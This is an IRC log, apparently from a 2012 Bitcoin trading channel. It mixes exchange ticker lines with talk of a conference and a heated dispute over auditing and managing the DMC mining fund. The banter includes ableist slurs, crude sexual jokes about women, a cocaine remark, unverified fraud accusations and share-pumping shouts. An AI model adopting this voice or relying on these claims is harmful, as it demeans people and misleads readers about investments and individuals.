[S.MPOE] 27772 @ 0.00039538 = 10.9805 BTC [+] Sep 15 02:21:25 Diablo-D3, if it's hosted by scammers/retarded businesses, go there for the lulz. Sep 15 02:21:26 nefario: I dunno, parties arent my thing Sep 15 02:21:41 It was so fun though Sep 15 02:21:46 speaking to people face to face Sep 15 02:21:49 about bitcoin Sep 15 02:21:54 actuall intelligent people Sep 15 02:22:00 who were not retarded Sep 15 02:22:09 or who you didn't have to explain the basics to Sep 15 02:22:24 heh, still, not my thing Sep 15 02:22:24 ah, true, an occasion to meet the bitcoin crowd Sep 15 02:22:32 who showed up? Sep 15 02:23:20 about 100-150 people Sep 15 02:23:21 the place was packed Sep 15 02:24:10 my table waited for 1 and 1/2 hours for food Sep 15 02:24:14 I was starving by the time it came Sep 15 02:24:29 but I have to say it was pretty nice Sep 15 02:24:31 turkish food Sep 15 02:25:18 http://twitter.com/BitcoinByte/status/246723539548381184/photo/1/large Sep 15 02:25:23 http://twitter.com/BitcoinByte/status/246725359876337666 Sep 15 02:25:30 I didn't get any pics Sep 15 02:25:33 phone ran out of battery Sep 15 02:25:58 ouch Sep 15 02:26:56 [GLBSE] [OBSI.HRPT] 1 @ 0.09989999 BTC [-] Sep 15 02:27:18 ib? Sep 15 02:27:27 I bet? Sep 15 02:27:43 [GLBSE] [MMM] 1 @ 1 BTC [+] Sep 15 02:27:56 oh Sep 15 02:28:09 first time I've come across it Sep 15 02:28:12 well gents Sep 15 02:28:26 I'm afraid Im rather smelly from my loooong day Sep 15 02:28:28 so Sep 15 02:28:37 shit shower and a shave, I'll be a new man Sep 15 02:28:51 later Sep 15 02:37:01 [GLBSE] [BITBOND] 8 @ 0.331 = 2.648 BTC [+] Sep 15 02:38:43 [GLBSE] [NYAN.A] 3 @ 0.99999 = 3 BTC [+] Sep 15 02:38:44 [GLBSE] [NYAN.A] 16 @ 0.999999 = 16 BTC [+] Sep 15 02:49:29 [GLBSE] [FPGAMINING] 10 @ 0.66 = 6.6 BTC [-] Sep 15 02:49:31 [GLBSE] [FPGAMINING] 7 @ 0.651 = 4.557 BTC [-] Sep 15 02:49:32 [GLBSE] [FPGAMINING] 4 @ 0.65 = 2.6 BTC [-] Sep 15 02:49:34 [GLBSE] [FPGAMINING] 2 @ 0.65 = 1.3 BTC [-] Sep 15 02:49:35 [GLBSE] [FPGAMINING] 10 @ 0.65 = 6.5 BTC [-] Sep 15 02:49:35 [GLBSE] [FPGAMINING] 2 @ 0.64 = 1.28 BTC [-] Sep 15 02:49:36 [GLBSE] [FPGAMINING] 10 @ 0.64 = 6.4 BTC [-] Sep 15 02:49:38 [GLBSE] [FPGAMINING] 5 @ 0.6302 = 3.151 BTC [-] Sep 15 02:50:05 [MPEX] [S.MPOE] 1349 @ 0.00039528 = 0.5332 BTC [-] Sep 15 02:50:07 [MPEX] [S.MPOE] 14853 @ 0.00039519 = 5.8698 BTC [-] Sep 15 02:50:27 [GLBSE] [FPGAMINING] 1 @ 0.6302 BTC [-] Sep 15 02:50:28 [GLBSE] [FPGAMINING] 6 @ 0.6301 = 3.7806 BTC [-] Sep 15 02:50:29 [GLBSE] [FPGAMINING] 10 @ 0.63 = 6.3 BTC [-] Sep 15 02:50:30 [GLBSE] [FPGAMINING] 1 @ 0.62 BTC [-] Sep 15 02:50:31 [GLBSE] [FPGAMINING] 10 @ 0.62 = 6.2 BTC [-] Sep 15 02:50:32 [GLBSE] [FPGAMINING] 2 @ 0.61 = 1.22 BTC [-] Sep 15 02:53:43 [GLBSE] [NYAN.C] 1 @ 0.398 BTC [+] Sep 15 03:02:50 Buying DMC shares Sep 15 03:04:29 [GLBSE] [NYAN.B] 4 @ 0.9899 = 3.9596 BTC [+] Sep 15 03:05:50 [GLBSE] [NYAN.B] 1 @ 0.99 BTC [+] Sep 15 03:06:20 [GLBSE] [FPGA.CONTRACT] 3 @ 0.0525001 = 0.1575 BTC [-] Sep 15 03:09:17 [GLBSE] [BIF.BTCST.PPT] 1 @ 0.1 BTC [+] Sep 15 03:10:30 [GLBSE] [TYGRR.BOND-P] 2 @ 0.034 = 0.068 BTC [-] Sep 15 03:16:12 lefuck. Sep 15 03:16:47 Pirate still trading? Sep 15 03:16:56 Buying DMC shares, anyone? Sep 15 03:17:37 Offering up to 0.04 per share Sep 15 03:17:57 [MPEX] [S.MPOE] 7447 @ 0.00039519 = 2.943 BTC [-] Sep 15 03:17:58 nginx Sep 15 03:18:02 cant even type. Sep 15 03:18:06 so tierd. Sep 15 03:18:08 lol Sep 15 03:19:05 gropecunt lane Sep 15 03:19:11 an actual place in london Sep 15 03:19:27 used to be a red light district Sep 15 03:19:46 do we have a feed from the conf Sep 15 03:20:13 not live no Sep 15 03:20:19 but all talks will be recorded Sep 15 03:20:27 meh Sep 15 03:20:28 we need live Sep 15 03:20:36 tomorrow this will be ancient history Sep 15 03:21:39 should have bought a ticket Sep 15 03:22:13 BTC-Mining: why, interested in trying to buy your 54 shares back? =P Sep 15 03:22:50 Why, yes Sep 15 03:23:03 well too bad, I need those Sep 15 03:23:10 need to balance out all that delicious abmo Sep 15 03:24:13 [GLBSE] [PUREMINING] 1 @ 0.08899999 BTC [-] Sep 15 03:24:56 I was expecting you to be thrown out and assets liquidated at that point, or betting on it. No offence. And since I have a mostly mining portfolio, I'm interested in having a chunk of the shares. Especially if I can trade them for the BTC-Mining shares. Sep 15 03:26:00 I doubt Im going to be thrown out Sep 15 03:27:15 Well I wonder where the numbers are up to by now. Sep 15 03:27:24 who knows Sep 15 03:30:08 Nevertheless, in any case, I'll buy more DMCs Sep 15 03:30:38 lol Sep 15 03:30:41 <[\\\]> too late, I own them all Sep 15 03:30:51 haha Sep 15 03:30:55 bad imsaguy Sep 15 03:31:12 no making smart investments Sep 15 03:31:36 [\\\]: how many? Sep 15 03:31:39 diablo, how old are you? Sep 15 03:31:40 <[\\\]> all your hash are belong to us Sep 15 03:31:56 nefario: 28. Sep 15 03:32:05 same age as me Sep 15 03:32:08 nearly Sep 15 03:32:13 weird Sep 15 03:33:13 <[\\\]> lol Sep 15 03:33:20 <[\\\]> BTC-Mining: 42 Sep 15 03:34:32 Oh... so that's all DMC's shares uh... I'm sure of that. Sep 15 03:34:42 yup, totally Sep 15 03:35:20 guys Sep 15 03:35:29 Im looking for advice on creating a default contract Sep 15 03:35:33 Damn, if that's all the DMC shares there is, what am I holding? Must be fake shares! Sep 15 03:36:00 to which all contracts turn when they don't have a clause to handle any upcoming issues Sep 15 03:36:25 nefario: a standard offer? Sep 15 03:36:34 no Sep 15 03:36:41 a standard framework? Sep 15 03:36:50 a standard contract for as many contingencies as we can think of Sep 15 03:36:57 [MPEX] [S.DICE] 8000 @ 0.0034 = 27.2 BTC [+] Sep 15 03:37:00 so when there are new contracts Sep 15 03:37:09 if they don't include a clause to handle an event Sep 15 03:37:17 I see... Sep 15 03:37:22 it then goes to the standard contract Sep 15 03:37:45 think of the contract as being a child class of a standard contract Sep 15 03:37:51 I think a troll face would be easier than writing such lenghty default clauses contract Sep 15 03:37:56 inheriting it's methods and properties Sep 15 03:38:06 BTC-Mining: I agree, its how everyone treats contracts anyhow Sep 15 03:38:07 which you can override Sep 15 03:38:30 BTC-Mining: dont like the contract? whine at nefario until he fucks up everybody's shit Sep 15 03:38:34 my table waited for 1 and 1/2 hours for food << lol Sep 15 03:38:43 so in the end, who that we might have known showed up ? Sep 15 03:38:45 <[\\\]> you realize that people will just write their own generic clause Sep 15 03:38:53 rg !!!! Sep 15 03:38:54 nefario, surely the obvious starting point would be the standard contracts, laws and regulations, whatever, from existing stock exchanges like Wall Street? Sep 15 03:39:03 <[\\\]> anything not contained herein is to be decided by the asset manager Sep 15 03:39:15 [\\\] he doesn't think that far ahead. Sep 15 03:39:19 <[\\\]> and bam, your entire 'default' is overridden Sep 15 03:39:23 <[\\\]> glwt Sep 15 03:39:42 someone already mentioned that Sep 15 03:39:53 and I don't think that would be allowed Sep 15 03:39:56 ahahah Sep 15 03:39:58 <[\\\]> ah right Sep 15 03:40:05 <[\\\]> so now you get to determine what the contracts are? Sep 15 03:40:08 <[\\\]> what next? Sep 15 03:40:09 Diablo-D3, you fucked everybody's shit. You kept making trade-ins valuating DMC under NAV value so everyone would trade. Sep 15 03:40:12 <[\\\]> write their contract for them? Sep 15 03:40:21 <[\\\]> determine the price for them? Sep 15 03:40:23 i can't believe this guy is still taken seriously by anyone. Sep 15 03:40:34 [\\\]: we have the power to approve new assets Sep 15 03:40:43 or deny them Sep 15 03:40:46 Im setting up a board Sep 15 03:40:53 that will do just that Sep 15 03:41:02 BTC-Mining: nope Sep 15 03:41:07 shitty contracts will probably be turned down as a result Sep 15 03:41:17 BTC-Mining: and even if I did, I did not violate the contract Sep 15 03:41:31 For DMC the auditing has already begun Sep 15 03:41:42 <[\\\]> nefario: by whom? Sep 15 03:42:39 Or perhaps shitty contracts will still be allowed Sep 15 03:42:48 but then no one will buy ones with such a clause Sep 15 03:42:55 well, the problem nefario Sep 15 03:43:03 is DMC was one of the longer contracts on GLBSE, and you signed off on it Sep 15 03:43:34 Diablo-D3 actually, the oldest contract was "test", by goat. Sep 15 03:43:42 I've hired an outside party with qualifications Sep 15 03:43:49 mircea_popescu: I said longer not older Sep 15 03:43:55 they will work out a profit and loss Sep 15 03:43:56 o o sorry my bad Sep 15 03:44:06 also, goats a redditer? woah Sep 15 03:44:09 then I'm getting someone else to write a report (another auditor) Sep 15 03:44:12 and finally Sep 15 03:44:28 a third person to verify the profit and loss, and report are correct Sep 15 03:44:45 nefario: as long as none of those are smickles, thats ... still a dumb idea. Sep 15 03:45:05 auditing is a dumb idea? Sep 15 03:45:12 no, trusting you to it Sep 15 03:45:19 I'm not doing it Sep 15 03:45:24 which is the point Sep 15 03:45:29 I don't have the time Sep 15 03:45:37 Have a conference to attend and run Sep 15 03:45:42 stock market Sep 15 03:45:47 change the world Sep 15 03:45:48 etc. Sep 15 03:46:12 i haven't had such a good laugh in probably months Sep 15 03:46:21 so glbbq isn't entirely a waste. it entertains. Sep 15 03:46:31 I dont trust you to chose auditors. Sep 15 03:47:02 I've only gotten one so far Sep 15 03:47:03 why not ? he could "hire" usagi, an anonymous "3rd party" with "qualifications". he knows ito integral calculus! Sep 15 03:47:07 <[\\\]> I've hired an outside party with qualifications << whom? Sep 15 03:47:12 <[\\\]> the auditor should be well known Sep 15 03:47:12 mircea_popescu: I lol'd Sep 15 03:47:19 <[\\\]> in fact, its announced BEFORE the audit Sep 15 03:47:21 I agree with imsaguy Sep 15 03:47:24 <[\\\]> at least on a real stock exchange Sep 15 03:47:30 this whole thing is extremely shady Sep 15 03:47:37 auditor shopping lol Sep 15 03:47:44 not only that, the shareholders should have to agree to the chosen auditors as well Sep 15 03:47:48 <[\\\]> aye Sep 15 03:47:57 <[\\\]> I think Diablo-D3 is a douchebag Sep 15 03:47:59 <[\\\]> don't get me wrong Sep 15 03:48:02 <[\\\]> but this stinks of shady Sep 15 03:48:05 for my curiosity, how much does an auditor make per hour in btcland ? Sep 15 03:48:16 <[\\\]> mircea_popescu: 32 Sep 15 03:48:18 <[\\\]> err 42 Sep 15 03:48:19 mircea_popescu: we're missing you at the conference Sep 15 03:48:22 maybe i could outsource. Sep 15 03:48:23 hugs and kisses Sep 15 03:48:36 nefario ty, if i ever need to sleep on the floor in the insalubrious apartment of a failed poker player Sep 15 03:48:38 <[\\\]> notice how my questions go unanswered? Sep 15 03:48:42 i have plenty of acquaintances to oblige . Sep 15 03:48:42 <[\\\]> Who is doing the audit? Sep 15 03:48:55 mircea_popescu you should've attended Sep 15 03:48:56 mircea_popescu: I don't play poker Sep 15 03:49:00 i'm disappointed Sep 15 03:49:01 not you fool. Sep 15 03:49:18 jcpham how's teh soup ? Sep 15 03:49:28 you know you look like a tool on the forum Sep 15 03:49:38 everyones there Sep 15 03:49:38 which forum do i look like a tool on ? Sep 15 03:49:47 sorry i'm not from the eurasian continent Sep 15 03:49:57 <[\\\]> Who is doing the audit of DMC? Sep 15 03:49:58 it's a pretty small place i hear Sep 15 03:50:00 dude, forum scum != bitcoin. quite the opposite, actually. Sep 15 03:50:34 mircea_popescu i'm disappointed you didn't go to look down upon them Sep 15 03:50:55 you know, pull up in your limo full of ladies Sep 15 03:50:58 jcpham well, i saw no point in doubling their credibility. Sep 15 03:51:00 [\\\]: I'll announce it later Sep 15 03:51:04 good point Sep 15 03:51:08 jcpham: and his 12 foot tall black bodyguards Sep 15 03:51:21 Diablo-D3 nah, the girls double as bodyguards. Sep 15 03:51:32 those breast implants come in handy, I guess Sep 15 03:51:34 any time you can flaunt it, you should Sep 15 03:52:02 Diablo-D3 especially if it gets cold at all, they can stab you in teh eye. Sep 15 03:52:05 sometimes i give horrible advice on irc freely Sep 15 03:52:10 vote or die, mothafucka Sep 15 03:52:32 or else you're getting hard nipple in the eye. Sep 15 03:52:36 <[\\\]> [\\\]: I'll announce it later << when? Sep 15 03:52:43 [\\\] no one is, for now there's only a motion about if Diablo should be thrown out of managing DMC Sep 15 03:52:55 <[\\\]> BTC-Mining: nefario said it already began Sep 15 03:53:00 wrong Sep 15 03:53:01 <[\\\]> so which is it? Sep 15 03:53:11 I said DMC is being audited Sep 15 03:53:34 [GLBSE] [PUREMINING] 6 @ 0.08889999 = 0.5334 BTC [-] Sep 15 03:53:47 <[\\\]> yeah Sep 15 03:53:50 <[\\\]> the audit already began Sep 15 03:53:55 <[\\\]> which means what BTC-Mining said is false Sep 15 03:53:58 DMC cant be audited until the shareholders sign off on the auditors. Sep 15 03:53:59 Diablo-D3 i remember when i thought u were joking about DMC Sep 15 03:54:14 what's the problem Sep 15 03:54:17 The audit should be done before the vote is closed Sep 15 03:54:19 how exactly is this "audit" going to go exactly ? Sep 15 03:54:26 do you depose Diablo-D3 ? Sep 15 03:54:26 [GLBSE] [PUREMINING] 8 @ 0.08899999 = 0.712 BTC [+] Sep 15 03:54:37 mircea_popescu: he doesnt even make sense anymore =/ Sep 15 03:55:57 <[\\\]> How will the auditor know what mining assets DMC has? Sep 15 03:56:02 <[\\\]> going to visit Diablo-D3? Sep 15 03:56:13 <[\\\]> man, that airfare is going to eat whatever value is in DMC Sep 15 03:56:19 yeah, really. Sep 15 03:56:36 jcpham btc, XBIZ London would prolly be more to your taste anyway. i think i have invites somewhere too Sep 15 03:57:46 if i go to conference, i'd probably start a riot Sep 15 03:57:57 lol why ? Sep 15 03:58:25 people see me and want more Sep 15 03:58:30 and i just can't give it to them Sep 15 03:58:55 is that why you're locked in your mothers basement? Sep 15 03:59:07 yes, exactlynefario Sep 15 03:59:18 i just can't hve nice things Sep 15 03:59:20 lol im sure the girls have seen it all. Sep 15 03:59:52 not sure sisters count Sep 15 04:00:08 or nephews? Sep 15 04:00:31 or first cousins? Sep 15 04:00:33 Que Serra Serra/ Sep 15 04:00:41 smh Sep 15 04:00:48 singe r Doffx Sep 15 04:01:01 haha Sep 15 04:01:52 jcpham http://www.xbizeu.com/schedule.php there, pussycash is sponsoring teh registrations. Sep 15 04:02:28 You've never made sense, trading DMC shares for less than par value. It works like a reverse ponzi. The late investors get more. Sep 15 04:02:39 Ohhh that looks like fun mircea_popescu Sep 15 04:02:55 they usually throw some kickass parties, but meh. Sep 15 04:03:00 [GLBSE] [RSM] 3 @ 0.3 = 0.9 BTC [+] Sep 15 04:03:03 london is messy and crowded. and after a while... Sep 15 04:03:04 It's also quite against the contract terms, it was supposed to be for buying mining equipment. You should have motioned going fund managing and the trading chart rates. Sep 15 04:03:28 BTC-Mining: read the contract terms again Sep 15 04:03:57 [MPEX] [S.MPOE] 12700 @ 0.00039412 = 5.0053 BTC [-] Sep 15 04:04:52 If you consider reinvesting in equipment to be equivalent to buying mining stocks, then yes, for that part, 50% reinvestment is ok. Sep 15 04:05:12 BTC-Mining: I outsourced the mining until the DC is done Sep 15 04:05:13 The trading part was not however. Trading rates should have been motioned Sep 15 04:05:18 [GLBSE] [PAJKA.BOND] 4 @ 0.082 = 0.328 BTC [-] Sep 15 04:05:20 [GLBSE] [PAJKA.BOND] 5 @ 0.0823 = 0.4115 BTC [+] Sep 15 04:05:21 [GLBSE] [PAJKA.BOND] 6 @ 0.08235 = 0.4941 BTC [+] Sep 15 04:06:56 BTC-Mining does have a point there. Sep 15 04:06:57 [MPEX] [O.BTCUSD.C090T] 38 @ 0.29949219 = 11.3807 BTC [+] Sep 15 04:07:00 [GLBSE] [PAJKA.BOND] 5 @ 0.0824 = 0.412 BTC [+] Sep 15 04:07:41 the trading provided much needed liquidity to the market Sep 15 04:07:42 when you failed to get your original funds (1 mn btc) you should have repaid investors and that's that ; not doing that the next best thing would have been to trade market rather than your imaginary valuations. you got raped cause of them. Sep 15 04:08:39 but was always made against existing shareholders to the profit of new people coming in. You always changed the trading rate to be under NAV to constantly attract people to trade shares with DMC. Sep 15 04:09:27 It's that part which pissed everyone off, mostly. Sep 15 04:09:56 no, people got pissed off at what they thought was happening Sep 15 04:10:05 d'oh ? Sep 15 04:10:11 what ELSE would they get pissed at ? Sep 15 04:10:19 instead of thinking about it for a moment, they ran off half cocked and will probably end up costing them their investment Sep 15 04:10:42 [GLBSE] [COGNITIVE] 4 @ 0.5001 = 2.0004 BTC [-] Sep 15 04:10:43 [GLBSE] [COGNITIVE] 4 @ 0.5 = 2 BTC [-] Sep 15 04:10:44 [GLBSE] [BLUECHIP] 1 @ 0.1 BTC [+] Sep 15 04:11:23 be more speciffic. Sep 15 04:11:50 [GLBSE] [BTCS] 11 @ 0.0105 = 0.1155 BTC [-] Sep 15 04:11:51 I traded most of the stuff for _now_ ~1 btc = 1 dmc Sep 15 04:12:03 the only thing that differed greatly was asicminer Sep 15 04:12:47 nah, i recall a conversation we had where you were trading about 1/6 of mkt value Sep 15 04:12:53 Diablo-D3, haha you have got to be the most stubborn person ive ever seen. Sep 15 04:13:28 I thought my wife was bad, glad im not married to you! Sep 15 04:13:30 :) Sep 15 04:13:39 you have to be stubborn to do this kind of work Sep 15 04:13:51 if you let every little thing stop you, you'd never get anything done Sep 15 04:14:34 in this case it worked in reverse. Sep 15 04:15:01 ... on the contrary, you need to work through them. Being little things, they're easily walked over, not impossible to pass walls. Sep 15 04:15:13 or at least that's my opinion Sep 15 04:15:26 BTC-Mining: yes, and I have been working through them Sep 15 04:15:36 I havent stopped working on DMC, even with nefario's threats Sep 15 04:15:49 [GLBSE] [OBSI.HRPT] 120 @ 0.09989999 = 11.988 BTC [-] Sep 15 04:15:50 [GLBSE] [OBSI.HRPT] 46 @ 0.0999 = 4.5954 BTC [+] Sep 15 04:15:52 [GLBSE] [OBSI.HRPT] 99 @ 0.0999 = 9.8901 BTC [+] Sep 15 04:15:53 [GLBSE] [OBSI.HRPT] 24 @ 0.0999999 = 2.4 BTC [+] Sep 15 04:15:54 [GLBSE] [OBSI.HRPT] 6 @ 0.09999991 = 0.6 BTC [+] Sep 15 04:15:54 what threats? Sep 15 04:15:55 [GLBSE] [OBSI.HRPT] 5 @ 0.09999994 = 0.5 BTC [+] Sep 15 04:16:41 [GLBSE] [OBSI.HRPT] 24 @ 0.09999994 = 2.4 BTC [+] Sep 15 04:16:55 [GLBSE] [BBBB] 50 @ 0.0002 = 0.01 BTC [+] Sep 15 04:17:30 [GLBSE] [ASICMINER] 25 @ 0.11968988 = 2.9922 BTC [+] Sep 15 04:17:32 [GLBSE] [ASICMINER] 8 @ 0.119798 = 0.9584 BTC [+] Sep 15 04:17:52 [GLBSE] [OBSI.HRPT] 1 @ 0.09999994 BTC [+] Sep 15 04:17:54 nefario1: that you're going to shaft shareholders based on a motion most of them dont have enough information to make a decision on Sep 15 04:18:07 <[\\\]> asicminer going up, does someone know something the rest of us don't know? Sep 15 04:18:12 they can always vote down the motion Sep 15 04:18:26 Its coming out next week, you didint see the post? Sep 15 04:18:30 Doffx: url Sep 15 04:18:32 :P Sep 15 04:18:40 you're kidding arent you Sep 15 04:18:41 you ass Sep 15 04:18:45 I'm completly kidding Sep 15 04:18:58 [GLBSE] [MMM] 1 @ 1 BTC [+] Sep 15 04:19:01 Doffx is also on that list of people repaid Sep 15 04:19:04 it's been going up and down with the wind. Sep 15 04:19:06 [GLBSE] [OBSI.HRPT] 1 @ 0.0997 BTC [-] Sep 15 04:19:07 that other thing Sep 15 04:19:08 I realisticly expect these things around january Sep 15 04:19:16 doffx 2013 ? 2015 ? Sep 15 04:19:25 2013 Sep 15 04:19:41 I think even modminer will be january Sep 15 04:19:48 He's going to either liquidate the assets and return the funds to shareholders or motion for a new person to manage DMC Sep 15 04:19:57 I still want to see friedcat get his going sooner. Sep 15 04:20:07 not shaft shareholders... Sep 15 04:20:16 I am on that other list jcpham Sep 15 04:20:27 [GLBSE] [OBSI.HRPT] 10 @ 0.0985 = 0.985 BTC [-] Sep 15 04:20:29 They'll keep all value stored in DMC's assets Sep 15 04:20:34 It makes me sad daily that I didnt sell at 12 when I planned then talked myself out of it Sep 15 04:20:42 BTC-Mining well his theory is that under any management other than his own investors are "getting shafted" mostly because the liquidation value of assets diverges from the arbitrary value he assigned to same assets. Sep 15 04:21:32 [GLBSE] [COGNITIVE] 2 @ 0.4999 = 0.9998 BTC [-] Sep 15 04:22:55 [GLBSE] [FZB.A] 46 @ 0.0321 = 1.4766 BTC [+] Sep 15 04:24:18 mircea_popescu: nefario can only liquidate assets on glbse Sep 15 04:24:31 do you hold other assets ? Sep 15 04:24:43 [GLBSE] [GIGAMINING] 1 @ 0.6199 BTC [-] Sep 15 04:24:43 [GLBSE] [GIGAMINING] 1 @ 0.62 BTC [+] Sep 15 04:24:45 [GLBSE] [GIGAMINING] 2 @ 0.62 = 1.24 BTC [+] Sep 15 04:25:01 are you asking the question if DMC is moving ahead on other parts of the plan? yes. Sep 15 04:25:30 no. does dmc own tangible assets outside of glbse Sep 15 04:25:38 like, a car. a brick. some celery. anything. Sep 15 04:25:45 or BTC Sep 15 04:26:37 I can sell him a brick, and some organic celery if needed/ Sep 15 04:26:46 had some organic coke the other day Sep 15 04:26:50 dammit I cant seem to hit the . button tonight Sep 15 04:26:57 [MPEX] [O.BTCUSD.C100T] 977 @ 0.14520725 = 141.8675 BTC [-] Sep 15 04:26:57 all I can say about it is Sep 15 04:27:07 coke is a HELLOVADRUG Sep 15 04:27:12 mircea_popescu: yes, I have some celery in the fridge, shareholders can have it. Sep 15 04:27:15 derp herp. Sep 15 04:27:25 Haha, your not helping nefario1. Sep 15 04:27:31 Wtf with your name too Sep 15 04:27:40 don't start with usagi-esque fraud/donations. does it own anything. Sep 15 04:27:42 network keeps cutting out Sep 15 04:27:55 so I keep getting renamed Sep 15 04:28:09 mircea_popescu: Ive already answered the question Sep 15 04:28:11 haha Sep 15 04:28:25 well i never saw teh answer, so waht is it ? Sep 15 04:28:41 mircea_popescu: read the thread more Sep 15 04:28:53 i never read any thread lol. Sep 15 04:29:20 mircea_popescu, is all knowing, he doesnt do threads. Sep 15 04:29:54 Doffx i get weekly digests, but more's the point, wtf sort of q is this to need a reference answer. "yes, 500 dollars in cash and a used condom.". "no" Sep 15 04:30:12 mircea_popescu: you... dont read... threads.... Sep 15 04:30:17 haha, I was just trying to be funny. Sep 15 04:30:32 Need to try harder I suppose. Sep 15 04:30:34 Diablo-D3 i got a girl to do that for me. Sep 15 04:30:39 Doffx nono. try softer :D Sep 15 04:30:44 :) Sep 15 04:30:57 [GLBSE] [GIGAMINING] 1 @ 0.61921 BTC [-] Sep 15 04:30:58 [GLBSE] [GIGAMINING] 5 @ 0.6192 = 3.096 BTC [-] Sep 15 04:31:00 [GLBSE] [GIGAMINING] 5 @ 0.6191 = 3.0955 BTC [-] Sep 15 04:31:10 mircea_popescu: argh now you sound like goat Sep 15 04:31:19 maybe vice-versa. Sep 15 04:31:26 and at great effort on his part, i might add. Sep 15 04:32:17 Not even close, there would need to be at least 10 mispellings, and 15 typos and a sentance that makes no sense whatsoever. Sep 15 04:32:26 [GLBSE] [OBSI.HRPT] 3 @ 0.09999994 = 0.3 BTC [+] Sep 15 04:32:28 [GLBSE] [GIGAMINING] 313 @ 0.62 = 194.06 BTC [+] Sep 15 04:32:30 [GLBSE] [GIGAMINING] 1 @ 0.69 BTC [+] Sep 15 04:32:40 he does speak a very approximative english, does he. Sep 15 04:32:58 slightly more approximate than yours at times Sep 15 04:33:03 Whatever languange it is its messy Sep 15 04:33:21 wow thanks spell check Sep 15 04:33:28 haha Sep 15 04:33:34 What the heck is languange? Sep 15 04:33:41 jesus the dmc thread is a mess Sep 15 04:33:44 thanks nefario and co Sep 15 04:34:08 That was an Iphone text moment in IRC. Sep 15 04:34:11 which thread isn't a mess ? Sep 15 04:34:14 [GLBSE] [GIGAMINING] 4 @ 0.69 = 2.76 BTC [+] Sep 15 04:34:16 [GLBSE] [GIGAMINING] 3 @ 0.705653 = 2.117 BTC [+] Sep 15 04:34:17 [GLBSE] [GIGAMINING] 10 @ 0.721103 = 7.211 BTC [+] Sep 15 04:34:18 [GLBSE] [GIGAMINING] 1 @ 0.74 BTC [+] Sep 15 04:34:21 mircea_popescu: the dmc thread Sep 15 04:34:32 and whoever is buying gigamining: STOP WASTING YOUR MONEY Sep 15 04:34:45 BUY DMC Sep 15 04:34:53 I bought 1000 shares and traded it for DMC Sep 15 04:35:28 Sorry im bored and waiting for game to download. Sep 15 04:39:05 found it Sep 15 04:39:20 mircea_popescu: https://bitcointalk.org/index.php?topic=77469.msg1188408#msg1188408 Sep 15 04:40:45 doesn't seem to answer the question. assets. Sep 15 04:41:33 "No BTC from DMC has gone into the web hosting service project" this would mean "no assets". Sep 15 04:42:30 Anyone wants to get rid of their GIGAMINING shares? Sep 15 04:43:13 mircea_popescu: its funny you bring that up Sep 15 04:43:21 fairpoint would largely disagree with you on that Sep 15 04:43:50 in the contract between them and verizon when they bought up the northeast service area, assets sold to fairpoint included various contracts Sep 15 04:43:52 what/who is fairpoint Sep 15 04:44:03 fairpoint is one of the big phone companies in the US Sep 15 04:44:27 now, what verizon did was cancel those contracts after fairpoint purchased them but before the ownership switchover date passed Sep 15 04:44:32 a ok. i fail to see how that applies to your case. Sep 15 04:45:16 so, was verizon right in canceling those contracts after selling them to fairpoint? according to you, they're not assets even though they were crucial to the operation of the phone system Sep 15 04:45:27 !ticker BAKEWELL Sep 15 04:45:34 [GLBSE:BAKEWELL] [Bid: 0.12500001] [Ask: 0.15] [Spread: 0.02499999] [Last: 0.15] [24hVol: 0.45] [7dAvg: 0.15] Sep 15 04:45:52 look, if you put no company money into anything then you can't own anything. nothing from nothing doctrine. Sep 15 04:45:59 ;;later tell nefario done Sep 15 04:45:59 The operation succeeded. Sep 15 04:47:29 Damn, I see so many lending/investments requests where people ask for a business plan/legitimate questions. And the thread owner shrugs all questions off as trolls attacking their "obvious higher intellect/business skills". Cases of too stupid to know you're stupid? Sep 15 04:47:51 So many empty words answering so many crucial questions too... Sep 15 04:48:32 BTC-Mining hopefully anyone with any coins left has learned the pirate lesson by now Sep 15 04:48:43 Nice looking words forming meaningless statements are not arguments... keep that kind of talking for the art gallery. Sep 15 04:48:49 also hopefully the ones who haven't will orderly lose all their coins and will never be sufficiently many to ever matter again. Sep 15 04:49:00 mircea_popescu: so basically you shoved the entire service industry under a bus. good job. Sep 15 04:49:09 huh ? Sep 15 04:52:21 The service industry! It's getting away under buses! Catch it, catch it before it escapes to the neighboring countries! Sep 15 04:53:57 [MPEX] [S.MPOE] 27629 @ 0.00039408 = 10.888 BTC [-] Sep 15 04:54:06 "Any motions raised by shareholders will be considered non-binding advisory votes." Sep 15 04:54:09 ahaha this is funny. Sep 15 04:54:18 seems diablo DID HAVE a catchall clause in his contract. Sep 15 04:54:21 nao what bitchez,. Sep 15 04:54:57 I'm not a shareholder Sep 15 04:55:00 I raised the motion Sep 15 04:56:55 ... Sep 15 04:57:06 you'd seem to be a third party. Sep 15 04:57:55 ja Sep 15 04:58:17 ahh this trainwreck. Sep 15 04:58:38 it's like the funny paper. Sep 15 05:00:30 [MPEX] [O.BTCUSD.P080N] 1 @ 0.09633473 BTC [-] Sep 15 05:02:35 [GLBSE] [TYGRR.BOND-P] 2 @ 0.034 = 0.068 BTC [-] Sep 15 05:04:57 [GLBSE] [GIGAMINING] 1 @ 0.65000001 BTC [-] Sep 15 05:04:58 [GLBSE] [GIGAMINING] 10 @ 0.65 = 6.5 BTC [-] Sep 15 05:05:04 [GLBSE] [GIGAMINING] 1 @ 0.65 BTC [-] Sep 15 05:08:36 [GLBSE] [RAREEARTH] 70 @ 0.00955 = 0.6685 BTC [+] Sep 15 05:20:37 [GLBSE] [OBSI.HRPT] 6 @ 0.09999995 = 0.6 BTC [+] Sep 15 05:21:05 [GLBSE] [KRAKEN] 10 @ 0.009 = 0.09 BTC [-] Sep 15 05:25:57 [MPEX] [S.MPOE] 29044 @ 0.00039465 = 11.4622 BTC [+] Sep 15 05:25:58 [MPEX] [S.MPOE] 23509 @ 0.00039387 = 9.2595 BTC [-] Sep 15 05:33:46 [GLBSE] [BITCOINMINV] 10 @ 0.129 = 1.29 BTC [+] Sep 15 05:33:47 [GLBSE] [BITCOINMINV] 50 @ 0.129979 = 6.499 BTC [+] Sep 15 05:37:29 [GLBSE] [OBSI.HRPT] 8 @ 0.09999995 = 0.8 BTC [+] Sep 15 05:38:03 [GLBSE] [OBSI.HRPT] 10 @ 0.09999995 = 1 BTC [+] Sep 15 05:38:05 [GLBSE] [OBSI.HRPT] 4 @ 0.09999996 = 0.4 BTC [+] Sep 15 05:38:06 [GLBSE] [OBSI.HRPT] 4 @ 0.09999998 = 0.4 BTC [+] Sep 15 05:38:07 [GLBSE] [OBSI.HRPT] 3 @ 0.09999999 = 0.3 BTC [+] Sep 15 05:38:09 [GLBSE] [OBSI.HRPT] 16 @ 0.1 = 1.6 BTC [+] Sep 15 05:57:56 